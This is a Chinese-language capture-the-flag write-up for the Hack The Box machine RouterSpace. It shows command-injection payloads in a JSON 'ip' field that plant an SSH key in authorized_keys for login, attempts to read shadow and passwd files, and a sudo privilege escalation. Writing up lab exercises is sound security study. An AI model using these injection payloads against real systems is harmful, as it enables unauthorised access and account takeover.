当前位置:网站首页>hack the box:RouterSpace题解
hack the box:RouterSpace题解
2022-06-28 07:01:00 【zr1213159840】
先是正常的扫描,nmap,masscan,whatweb都上。
nmap -Pn -A 10.10.11.148
masscan --ports 10.10.11.148
whatweb 10.10.11.148
总结出如下信息:
1.开放了22和80端口
2.whatweb信息如下:
3.打开页面看看
以上总结出的信息没有太大作用,爆破下目录看看
dirsearch -u 10.10.11.148
发现这几个路径
随便输入一个进入后发现,会被拦截,此时第一个想法是绕过,尝试了大小写等各种方法,发现无法绕过,重放改包也不行。
第二个想法来自于点击右上角的download,会显示下载的路径,同时会下载下来apk的包。
尝试越权,也没用,完了,我不会,开摆了。
既然有app的话,那不如下载下来看看,用一些apk的分析工具分析一下看看,用的是apkanalyser。可以自行下载使用。
新建一个apps文件夹,然后将下载下来的文件进行解析,查找url等等相关信息,也没找到什么有用的。
但是,在运行期间,发现了这个,有点熟悉啊
routerspace.htb
因为被这个折磨过太多次,印象太深了,编辑hosts文件,然后访问试试。
tmd,还是原来的界面,这没法玩了。
不会要对app进行抓包吧?
根据这个链接,安装fiddler+夜神模拟器,下载提供的app,安装后抓包。
https://blog.csdn.net/21aspnet/article/details/103977908
界面
获取到的包从fiddler中转出,能发现只存在一个请求,就是点击上图的check status按钮发出的。
导出后如下图所示
放入bp中重放一下试试
执行下命令,发现能执行!
好了,这下有操作空间了。
我的第一想法是直接读取shadow文件进行密码破解,但是发现无法回显,什么都没有。
passwd以及group文件都可以查看,sudoers不行
由于打开了22端口,那能不能动一下.ssh文件呢?尝试一下
改包
{"ip":"0.0.0.0|echo test >/home/paul/.ssh/123.txt|ls -al /home/paul/.ssh/"}
发现能写入
与之前出现过的靶机相同,我们可以修改.ssh文件,然后通过ssh登录进去。原理步骤可参考这个链接
https://www.csdn.net/tags/OtTaQgwsMTk4MDctYmxvZwO0O0OO0O0O.html
本地生成id_rsa文件,然后将这个文件内容写入到靶机的.ssh文件夹下面
本地kali执行
ssh-keygen -t id_rsa
cat id_rsa
使用bp写入靶机.ssh文件夹中
{"ip":"0.0.0.0|echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBAxsuWvSvZCfCUmzJ5MMPv911a1pligTpQIo7M4RUMCDLKh4tA+bWIoOb72U5C6QBiFAnYaKRlmRqCnk5gS+WoKP4sI4ADln6or8u6+jqtW7qx+CGK9uG8p7du3TxN7KZw6YVrJxaASkPluKibgwEmqlVjHfWdwW0ZEJaqr/JFjqmEseKvVdWeFS6aq/m54rhlE8cQnYQg3csnO5I73/FSH1U1sOWir8fdht1zi19x5Yay+lWOBIYH/cNIBtE+Kw1br3OKmkcEhA9YV8K1wBh33AFrpwMrAD+PcsPmqYnav/r2raRA/LUrIXm8SmQsRgsW96DaBcUUMAP1DuJXo+dh0gb5BPCd2xa+chGZEjp3VuLI71K3u4d7ByHa60bRQ25SjK1OL6fo3TuSwCto5r5d16Ci1XG7k45YwB9jhhLLaOdbFyHzNxjQhUEVTkKoq1a5LvFjcD+ZS/4BN1yozD0TaCoY8CkgkGwOLc1hrgNsdZjH7zkI36/EwyMWASf9vE= [email protected]' >/home/paul/.ssh/authorized_keys|ls -al /home/paul/.ssh/"}
修改一下文件权限
{"ip":"0.0.0.0|chmod 700 /home/paul/.ssh/authorized_keys"}
在kali上登录,进入靶机
ssh [email protected] -i /home/kali/Desktop/id_rsa
拿到用户的flag
下面就要提权,拿到root的flag,提权使用linpeas.sh,这个地方不给使用wget,虽然有nc,但是我怎么都连接不了,无奈之下只好复制粘贴了,笨人有笨方法。
复制粘贴后运行linpeas.sh
vi linpeas.sh
粘贴复制的内容
./linpeas.sh
通过测试,可以使用旧版本的sudo提权
顺着sudo提权找到这个链接
分别复制粘贴以下几个文件的内容,直接提权成功!
拿到最终的key
参考了以下内容:
https://blog.csdn.net/weixin_45007073/article/details/123341343
边栏推荐
- 同花顺网上开户安全吗
- XML序列化向后兼容
- 【C语言】详解 C 语言获取数组长度
- Wechat applets - basics takes you to understand the life cycle of applets (I)
- Tryout title code
- Eyebeam advanced settings
- 4~20ma input /0~5v output i/v conversion circuit
- Build your jmeter+jenkins+ant
- Comment la passerelle BACnet / IP recueille - t - elle les données du système central de contrôle des bâtiments?
- Triode driven brushless motor
猜你喜欢
Wechat applets - basics takes you to understand the life cycle of applets (I)
看似简单的光耦电路,实际使用中应该注意些什么?
Niubi 666, this project makes web page making as simple as building blocks
Vivo browser rapid development platform practice - Overview
代码没写错,渲染页面不显示原因
JS regular expression system explanation (comprehensive summary)
Some habits of it veterans in the workplace
《微信小程序-基础篇》带你了解小程序中的生命周期(一)
Comment la passerelle BACnet / IP recueille - t - elle les données du système central de contrôle des bâtiments?
Floating and positioning
随机推荐
「杰伦熊」暴跌96.6% 明星带货NFT为何遇冷?
Speech enhancement - spectrum mapping
2021 VDC: technological architecture evolution of vivo Internet service for 100 million users | PPT download attached
Is it safe to open a stock trading account on your mobile phone?
搭建你jmeter+jenkins+ant
Servlet value passing JSP
普歌 -- 单例模式
freeswitch设置最大呼叫时长
Self discipline challenge 30 days
R 语言 ggmap 可视化集群
自律挑战30天
Voice network VQA: make the user's subjective experience of unknown video quality in real-time interaction known
Compile configuration in file
Optimization steps of SQL statements (II) -- MySQL statement optimization
Force buckle 515 Find the maximum value in each tree row
全方位透析真实企业软件测试流程
js正则表达式系统讲解(全面的总结)
LeetCode+ 51 - 55 回溯、动态规划专题
Triode driven brushless motor
编译原理期末复习